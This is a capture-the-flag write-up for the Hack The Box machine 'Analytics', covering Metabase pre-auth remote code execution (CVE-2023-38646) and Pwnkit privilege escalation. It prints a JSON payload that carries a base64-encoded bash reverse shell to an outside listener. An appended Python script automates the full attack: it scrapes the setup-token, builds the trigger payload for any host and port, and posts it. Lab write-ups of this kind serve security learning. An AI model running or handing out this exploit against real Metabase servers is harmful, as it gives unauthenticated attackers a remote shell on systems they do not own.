
HTB - Analytics

Summary

The box hosts a service for big data analytics. It runs a version of Metabase vulnerable to pre-auth RCE (CVE-2023-38646). An unauthenticated user is able to read the Metabase setup-token from the source code of the page, and can use it to get a reverse shell via /api/setup/validate. From there, basic enumeration turns up an environment variable that stores the SSH password for the user.

For root, running linpeas suggests some exploits, and judging from the Ubuntu version, it is vulnerable to Pwnkit (CVE-2021-4034). Pwnkit is a local privilege escalation exploit in polkit's pkexec utility (a SUID-root tool for running commands as another user, kinda like sudo) that affected all major Linux distributions.

The JSON payload for Metabase, sent to /api/setup/validate. "token" is the setup-token taken from the page source, and the base64 blob decodes to a bash reverse shell to 10.10.16.5:9001:

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details": {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules": {},
        "details": {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEwLjEwLjE2LjUvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "test",
        "engine": "h2"
    }
}
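As an added example (not the writeup's own code), the following Python script builds the payload above for any setup-token and listener address, and posts it to /api/setup/validate with the Content-Type header that Metabase needs in order to parse the body. The target URL, listener host and port are assumptions passed on the command line; the setup-token regex matches the "setup-token":"..." value embedded in the page source (the same value is returned by /api/session/properties on vulnerable versions).

```python
import base64
import json
import re
import sys
from typing import Optional
from urllib.error import HTTPError
from urllib.request import Request, urlopen

# Added example, not the writeup's own code. Builds the CVE-2023-38646 payload
# shown above for an arbitrary setup-token and listener, and optionally sends
# it. The target URL and the listener address are assumptions.

TOKEN_RE = re.compile(r'"setup-token"\s*:\s*"([0-9a-f-]{36})"')


def extract_setup_token(text: str) -> Optional[str]:
    """Pull the setup-token out of the page source (or out of the JSON that
    /api/session/properties returns, which embeds the same value)."""
    m = TOKEN_RE.search(text)
    return m.group(1) if m else None


def reverse_shell_b64(lhost: str, lport: int) -> str:
    """Base64 of the plain bash reverse shell, as used in the payload above."""
    cmd = f"bash -i >&/dev/tcp/{lhost}/{lport} 0>&1"
    return base64.b64encode(cmd.encode()).decode()


def build_payload(token: str, lhost: str, lport: int) -> dict:
    b64 = reverse_shell_b64(lhost, lport)
    # Runtime.exec() splits its single-string argument on whitespace, so the
    # command handed to "bash -c" uses brace expansion ({echo,...}) and the
    # base64 blob to avoid any spaces or quotes.
    shell = f"bash -c {{echo,{b64}}}|{{base64,-d}}|{{bash,-i}}"
    # H2 applies connection-URL settings as SET statements; the escaped "\;"
    # lets a CREATE TRIGGER with a JavaScript body ride along with
    # TRACE_LEVEL_SYSTEM_OUT, and the trigger fires when Metabase validates
    # the connection.
    db = (
        "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;"
        "TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON "
        "INFORMATION_SCHEMA.TABLES AS $$//javascript\n"
        f"java.lang.Runtime.getRuntime().exec('{shell}')\n$$--=x"
    )
    return {
        "token": token,
        "details": {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules": {},
            "details": {"db": db, "advanced-options": False, "ssl": True},
            "name": "test",
            "engine": "h2",
        },
    }


def send_payload(base_url: str, payload: dict) -> int:
    """POST the payload to /api/setup/validate and return the HTTP status.
    Without Content-Type: application/json Metabase does not parse the body."""
    req = Request(
        base_url.rstrip("/") + "/api/setup/validate",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.status
    except HTTPError as e:
        # The trigger runs before the error is reported, so a 4xx here is
        # expected; check the listener rather than the status code.
        return e.code


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} http://target:3000 LHOST LPORT")
    base, lhost, lport = sys.argv[1], sys.argv[2], int(sys.argv[3])
    with urlopen(base.rstrip("/") + "/", timeout=10) as resp:
        token = extract_setup_token(resp.read().decode(errors="replace"))
    if not token:
        sys.exit("no setup-token in page source; try /api/session/properties")
    print("setup-token:", token)
    status = send_payload(base, build_payload(token, lhost, lport))
    print("validate returned HTTP", status)
```

Start a listener (for example nc -lvnp 9001) before running it; the validate call itself usually errors out, and the shell arrives on the listener regardless.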

Some notes for silly mistakes I made

  • When crafting a json payload in Burp, make sure to include the Content-Type: application/json header for it to be parsed. I wasted too much time figuring out why my payload wasn’t working… 🙃
  • Check .env for credentials.
  • Base64-encode the reverse shell command; the payload runs it as {echo,...}|{base64,-d}|{bash,-i} so that no spaces or quotes end up in the command passed to Runtime.exec().
  • Look in /usr/bin for binaries we can use to transfer files from our host (e.g. curl or wget).
